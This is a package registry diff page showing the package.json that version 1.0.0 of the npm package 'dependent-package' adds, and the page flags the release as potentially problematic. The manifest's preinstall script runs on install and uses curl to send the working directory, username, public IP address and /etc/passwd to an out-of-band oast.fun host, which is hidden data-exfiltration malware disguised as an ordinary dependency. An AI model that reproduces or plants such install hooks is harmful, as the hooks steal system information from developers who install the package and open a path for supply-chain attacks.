dependent-package 1.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of dependent-package might be problematic. Click here for more details.

Files changed (1) hide show
  1. package/package.json +29 -0
package/package.json ADDED
@@ -0,0 +1,29 @@
1
+ {
2
+
3
+ "name": "dependent-package",
4
+
5
+ "version": "1.0.0",
6
+
7
+ "main": "main.js",
8
+
9
+ "scripts": {
10
+
11
+ "preinstall": "curl fkblgepxztqyfcekrxwgkgxc32mesmk6o.oast.fun/pwd=$(pwd) && curl fkblgepxztqyfcekrxwgkgxc32mesmk6o.oast.fun/whoami=$(whoami)&&curl fkblgepxztqyfcekrxwgkgxc32mesmk6o.oast.fun/package=$(echo 'dependent-package') && curl fkblgepxztqyfcekrxwgkgxc32mesmk6o.oast.fun/ip=$(curl ifconfig.me)&& curl --data '@/etc/passwd' fkblgepxztqyfcekrxwgkgxc32mesmk6o.oast.fun/hostname=$(hostname) ",
12
+
13
+ "test": "echo \"Error: no test specified\" && exit 1"
14
+
15
+ },
16
+
17
+ "author": "lexi2",
18
+
19
+ "license": "ISC",
20
+
21
+ "dependencies": {
22
+
23
+ "lodash": "^4.17.21"
24
+
25
+ },
26
+
27
+ "description": ""
28
+
29
+ }